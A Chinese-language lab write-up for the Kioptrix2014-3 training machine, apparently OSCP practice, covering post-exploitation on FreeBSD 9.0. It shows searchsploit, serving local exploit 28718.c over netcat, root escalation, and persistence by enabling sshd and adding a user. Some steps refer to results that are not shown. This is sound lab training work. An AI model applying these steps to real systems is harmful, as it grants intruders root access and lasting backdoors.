OSCP-Kioptrix2014-3 后渗透测试

拿到root权限

• 之前的努力,最终获得了两个session
  

• 尝试看看该操作系统的漏洞
  

kali:

searchsploit freebsd 9.0

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/

cd Desktop/

nc -lp 5656 < 28718.c -q 1

msf session:

提权成功

echo '' >> freebsd.c 之前编译报错,所以加个空行

• 尝试修改root密码
  
  看来高兴早了

修改ssh配置

echo sshd_enable="YES" >> /etc/rc.conf

    
/etc/rc.d/sshd start
/etc/rc.conf: sshd.enable=YES: not found
Starting sshd.

添加用户(kali/kali):

adduser
...

测试连接:

尝试一些操作:

$ cd /root/
$ touch test.txt
touch: test.txt: Permission denied

再次提权:

再次ssh以root登录: